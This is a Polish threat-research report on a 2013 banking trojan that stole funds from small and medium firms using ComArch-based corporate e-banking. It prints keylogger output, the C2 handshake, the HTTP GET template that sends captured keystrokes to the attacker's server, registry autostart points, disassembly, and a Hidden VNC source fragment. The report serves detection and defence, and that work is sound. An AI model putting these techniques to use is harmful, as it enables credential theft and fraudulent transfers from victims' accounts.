Złośliwe oprogramowanie dla bankowości korporacyjnej

Wielkość: px
Rozpocząć pokaz od strony:

Download "Złośliwe oprogramowanie dla bankowości korporacyjnej"

Transkrypt

1 Złośliwe oprogramowanie dla bankowości korporacyjnej Nowy atak na klientów bankowości korporacyjnej 10 Grudzień, 2013 Na przełomie września i października 2013 roku Zespół Prevenity zidentyfikował aktywność nowego złośliwego oprogramowania, które jest wykorzystywane w nowym scenariuszu kradzieży pieniędzy z kont klientów polskich banków. Tym razem atak skierowany jest na klientów korporacyjnych głównie małe i średnie przedsiębiorstwa korzystające z usług bankowości internetowej. Wstęp Scenariusz ataku jest bardzo prosty. Intruz instaluje keylogger oraz oprogramowanie do zestawiania połączenia za pomocą zdalnego pulpitu typu VNC. Keylogger rejestruje dane uwierzytelniające, autoryzujące transakcje oraz hasło do klucza, którym podpisywane są transakcje finansowe. W przypadku bankowości korporacyjnej zazwyczaj transakcje podpisywane są kluczem prywatnym, który przechowywany jest na zewnętrznym nośniku (np. karcie inteligentnej) lub w pliku na tym samym komputerze. Jeśli komputer jest włączony i z komputera nie została wyjęta karta inteligenta, intruz może w dowolnym momencie połączyć się z komputerem i wykonać przelew. Na dzień dzisiejszy złośliwe oprogramowanie nakierowane jest na aplikacje bankowości internetowej, które wykorzystują do uwierzytelniania i autoryzacji rozwiązania polskiej firmy ComArch S.A.. Poniżej przykład jednej z kilku wersji złośliwego oprogramowania podszywającego się pod aplikacje ComArch S.A.. Rysunek 1: Malware Prevenity

2 Złośliwa aplikacja rejestruje wprowadzane dane do formularzy przeglądarek internetowych oraz między innymi wywoływanych okien aplikacji, gdy wymagane jest podpisanie dyspozycji. Poniżej przykłady wywoływanych okien oraz fragment zarejestrowanej aktywności jednego z zainfekowanych użytkowników. Należy zaznaczyć, że zidentyfikowany malware ma możliwość podmiany danych transakcji (tzw. Man in the Browser). Jest to istotne, gdyż część implementacji oprócz podania hasła wymaga podania kodu SMS. Na chwilę obecną zanotowano jedynie ataki polegające na autoryzacji opartej wyłącznie o podpis kluczem. Jednakże nie można wykluczyć użycia w przyszłości i tej funkcji złośliwego oprogramowania. Rysunek 2: Oryginalne okna aplikacji do autoryzacji transakcji. [] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] H [H] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] a [Ha] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] s [Has] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] l [Hasl] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] o [Haslo] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [e] [&Podpisz] - - [Podpisz dyspozycję] - - [NAZWA BANKU S.A. - Windows Internet Explorer] [Lbut] Rysunek 3: Fragment zapisu malware. Zarejestrowane dane (w tym hasła) przesyłane są co określony interwał czasu do jednego z serwerów kontrolowanych przez intruzów. Każdy katalog to nazwa komputera i nazwa użytkownika. Poniżej fragment zawartości serwera oraz przykładowa zawartość katalogu. Każdy plik odpowiada uruchomionej aplikacji, z której przechwytywana była aktywność użytkownika (nie tylko wybrane klawisze klawiatury ale i kliknięcia myszą). Prevenity

3 Przykładowy katalog: Przykładowy katalog: Rysunek 4: Drop Zone oraz zawartość katalogów z danymi. Zidentyfikowany botnet działa od początku października. Dwie główne domeny.biz zarejestrowano 16 września 2013 roku, jednakże malware w pliku konfiguracyjnym ma wprowadzone inne domeny, które jeszcze nie są zarejestrowane również w domenie.biz. Każdego dnia pojawia się około 5-6 nowych zainfekowanych hostów z Polski. Malware uruchomiony na stacjach roboczych połączony jest co najmniej do dwóch sieci botnet. Oprócz dobrze znanego złośliwego oprogramowania typu ZeuS/Citadel zastosowany został nowy malware bazujący na kodzie Carberp. Intruzi w nowym malware wykorzystali między innymi bibliotekę Hidden VNC do zestawiania zdalnego pulpitu inicjowanego ze strony zainfekowanej stacji roboczej. Komunikacja jest szyfrowana. Nawiązywane jest połączenie z serwerem w domenie.biz na porcie 999/TCP. Poniżej przykład komunikacji przed i po zaszyfrowaniu. {"type":"handsnake","guid":"{d112baae-e BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} {"type":"send_me_update_please"} {"type":"cam_attached"} {"type":"cam_detached"} Rysunek 5: Fragment komunikacji botnet przed szyfrowaniem. Prevenity

4 Rysunek 5: Fragment komunikacji botnet po zaszyfrowaniu. Zalecenia dla firm Poniżej przedstawiamy ogólne zalecenia, które powinny zminimalizować ryzyko infekcji i kradzieży środków z konta firmowego. 1. Należy na bieżąco aktualizować system operacyjny oraz definicje systemu antywirusowego. 2. Należy wyjmować kartę inteligentną po wylogowaniu się z systemu bankowości internetowej. 3. Używać dedykowany komputer tylko i wyłącznie do celów łączenia się systemem bankowości internetowej. Jeśli to nie jest możliwe, nie instalować/uruchamiać oprogramowania, którego pochodzenia nie jesteśmy pewni. 4. Weryfikować historię autoryzowanych transakcji (szczególnie tych wykonywanych w paczkach). Szczegółowe informacje o złośliwym oprogramowaniu Zespół Prevenity zidentyfikował następujące komponenty złośliwego oprogramowania używane w atakach na klientów bankowości korporacyjnej. 1. Aplikacja typu keylogger 2. Aplikacja typu backdoor Keylogger Aplikacja keylogger składa się z dwóch elementów. Są to następujące pliki: Plik wykonywalny svcnost.exe Biblioteka Project2.dll Prevenity

5 Nazwa pliku Svcnost.exe Project2.dll MD5 6CD31B85902F2C1B B3 2D175618B6EB D2186C9B59 A0D380C9C401D35510B78CBDC9CB1B15 Plik svcnost.exe dodaje wpis do klucza rejestru RUN. Przy wywołaniu uruchamiany jest proces potomny z parametrami start+49 mov eax, offset adefault ; "default" start+4e mov ds:startupinfo.lpdesktop, eax start+53 push offset ProcessInformation ; lpprocessinformation start+58 push offset StartupInfo ; lpstartupinfo start+5d push 0 ; lpcurrentdirectory start+5f push 0 ; lpenvironment start+61 push 0 ; dwcreationflags start+63 push 0 ; binherithandles start+65 push 0 ; lpthreadattributes start+67 push 0 ; lpprocessattributes start+69 push offset CommandLine ; "svcnost.exe " start+6e push 0 ; lpapplicationname start+70 call CreateProcessA Następnie ładowana jest biblioteka Project2.dll i uruchamia z niej funkcja Hozzok(). Zidentyfikowaliśmy dwie wersje biblioteki Project2.dll. Pierwsza wersja rejestruje aktywność użytkownika do pliku tekstowego, druga przesyła zarejestrowane dane na zdalny serwer. W obu przypadkach keylogger-a użyta została funkcja SetWindowsHookEx do zainstalowania procedury przechwytywania zdarzeń. Funkcja SetWindowsHookEx eksportowana jest przez user32.dll. W tym przypadku keylogger przechwytuje zdarzenia z kolejki zdarzeń poszczególnych wątków (WH_GETMESSAGE). HHOOK WINAPI SetWindowsHookEx( Prevenity

6 _In_ int idhook, //typ procedury = 3 = WH_GETMESSAGE _In_ HOOKPROC lpfn, //procedura_logowanie _In_ HINSTANCE hmod, _In_ DWORD dwthreadid //0 ); Keylogger korzysta między innymi z funkcji GetWindowText do kopiowania nagłówka. Dla przykładu po wejściu na stronę główną kopiowany i zapisywany przez malware jest nagłówek Gazeta.pl Polska i świat wiadomości informacje wydarzenia Mozilla Firefox. Ułatwia to późniejszą identyfikację strony, której dotyczy zapisany login/hasło. W zarejestrowanej funkcji zaimplementowany jest filtr identyfikujący nazwy uruchamianych procesów. Keylogger zaczyna rejestrować aktywność użytkownika, gdy nazwy procesów zawierają poniższe ciągi znaków: Prevenity

7 Poniżej fragment kodu identyfikującego aplikacje firmy ComArch. Jak można zauważyć poniżej, przez malware rejestrowana jest też aktywność innych aplikacji niezwiązanych z korporacyjną bankowością internetową. Prevenity

8 Co kilka sekund budowane jest zapytanie i aktywność użytkownika przesyłana jest na zdalny serwer. Poniżej przykład takiego zapytania: GET URL/1.php?u=HOSTNAME_USERNAME&p=firefox.exe&a=LOGI HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MALC) Host: nazwa_hosta Connection: Keep-Alive Fragment kodu odpowiedzialny za budowę i wysyłanie zapytania GET. Poniżej fragment zawartości serwera budowa katalogu to nazwa zainfekowanego komputer i użytkownika na którego uprawnieniach działa malware. Prevenity

9 Backdoor VNC Druga aplikacja składa się z jednego pliku wykonywalnego. Plik zabezpieczony jest własnym pakerem i posiada zaimplementowanych kilka mechanizmów utrudniających analizę dynamiczną. Na zainfekowanym komputerze nazwa pliku wykonywalnego może przypominać nazwy programu systemowego (np. regedit.exe, waitfor.exe), MD5 analizowanego pliku: 3CC7EAD85080A667F3235F4E31BC5501. Opis pliku wskazuje na program z pakietu Sysinternals TCPView. Po zainstalowaniu złośliwe oprogramowanie tworzy katalog dllcache i kopiuje tam plik wykonywalny. Poniżej wszystkie punkty autostart dla analizowanego malware: C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\<nazwapliku>.lnk HKCU\Software\Microsoft\Windows\CurrentVersion\Run HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce HKCU\Control Panel\Desktop\Scrnsave.exe HKCU\Software\Microsoft\Command Processor\Autorun Prevenity

10 Gałąź HKCU jest używana w przypadku, gdy aplikacja nie jest uruchamiana z uprawnieniami administracyjnymi. Tworzony klucz to np. regedit z wskazaniem na plik regedit.exe w katalogu dllcache. Poniżej przykład: Większość zewnętrznych funkcji importowana jest dynamiczne. Poniżej kilka z nich, które będą używane do nawiązywania sesji VNC. Po uruchomieniu malware cześć kodu (dropper) ładowana jest do pamięci procesu explorer.exe. Kod ten monitoruje między innymi czy odpowiednie wpisy znajdują się w punktach autostart, wykrywa też obecność debuggera generując dużą ilość wątków dla monitorowanego procesu. Po uruchomieniu kod aplikacji sprawdza, czy w komputerze znajduje się karta inteligentna. Poniżej wykorzystywane funkcje API: SCardEstablishContext, SCardListReaders oraz SCardConnect. Dzięki temu intruz wie kiedy uzyskać dostęp do komputera w celu wykonania nieautoryzowanych transakcji. Prevenity

11 System zestawia szyfrowane połączenie VNC za pomocą komendy handsnake. Poniżej przykład komunikatu przed zaszyfrowaniem. {"type":"handsnake","guid":"{ D112BAAE-E BE45AAD315AADB87}","BuildId":"n","CompName":"LABPC","SystemVersion":"Windows 7 Home Premium Edition, 64-bit Service Pack 1 (build 7601); Polski (Polska)","ProcessorType":64,"ProcessorsCount":2,"ProcessorSpeed":1995,"BotVersio n": ,"memorysize":5814,"token":false,"timezone":"gmt+01:00","uptime":1584, "IdleTime":578,"HaveWebCam":true,"UserName":"Prevenity","Online":1} Funkcja zdalnego pulpitu bazuje na kodzie Hidden VNC, który dostępny jest w złośliwym oprogramowaniu Carberp (kod źródłowy wyciekł do Internetu na początku 2013 roku). Po uruchomieniu malware wywoływana jest funkcja VNCStartServer() a następnie NewClientAction(). Ta funkcja może uruchomić kamerę i/lub zdalny pulpit za pomocą funkcji API CreateDesktop(). rfbbool NewClientAction(rfbClientPtr cl) { PHVNC lpserver=(phvnc)cl->screen->screendata; cl->clientgonehook=clientgone; lpserver->eventsinfo.dwclients++; if (!cl->clientdata) cl->clientdata=memalloc(sizeof(hvnc_short_client_info)); HVNC_SHORT_CLIENT_INFO *lpclientinfo=(hvnc_short_client_info *)cl- >clientdata; lpclientinfo->dwlastkbdinputtime=lpclientinfo- >dwlastmouinputtime=gettickcount(); if (lpserver->deskinfo.bwebcam) #ifdef _HVNC_WEBCAM CamStartCapture(lpServer); #else ; #endif else if ((!lpserver->hdesktop) (!lpserver->dwexplorerspid) (!IsProcess(lpServer->dwExplorersPID))) { Prevenity

12 lpserver->hdesktop=createdesktopa(lpserver- >DeskInfo.szDeskName,NULL,NULL,DF_ALLOWOTHERACCOUNTHOOK,GENERIC_ALL,NULL); if (!lpserver->hdesktop) return FALSE; SetThreadDesktopEx(lpServer->hDesktop); lpserver->wndsinfo.hdeskwnd=getdesktopwindow(); Ciekawostki Jeden z naszych inżynierów w logach serwera znalazł zarejestrowaną aktywność intruza, który najprawdopodobniej testował złośliwe oprogramowanie i zapomniał je wyłączyć. Poniżej informacja o wybranych aktywnościach: Socks Admin v //anonimowy dostęp przez systemy proxy oraz VPN Dostęp do paneli administracyjnych: o [Andromeda bot webpanel] o Zeus Control Panel o Exploit Kit [Neutrino - Mozilla Firefox] Sprawdzał jaki jest przelicznik EURO/PLN [Konverter Euro (EUR) og Polsk zlotych (PLN) : Valuta Exchange Rate Conversion Calculator - Mozilla Firefox] Próbki malware testuje na: [Scan4You.net - Online Anonymous Virus and Malware Scan - Mozilla Firefox] Oczywiście sprawdzał też, kto jest klientem firmy ComArch S.A. aby przeszukać następnie bazę botnet. [Comarch - global IT business solutions provider - Mozilla Firefox] [Lb][Lb] [Comarch Customers - Mozilla Firefox] [Lb][Lb][Lb][Lb][Lb] [CP :: Search in database - Mozilla Firefox] [Lb][Lb][ctrl]x[Lb] Prevenity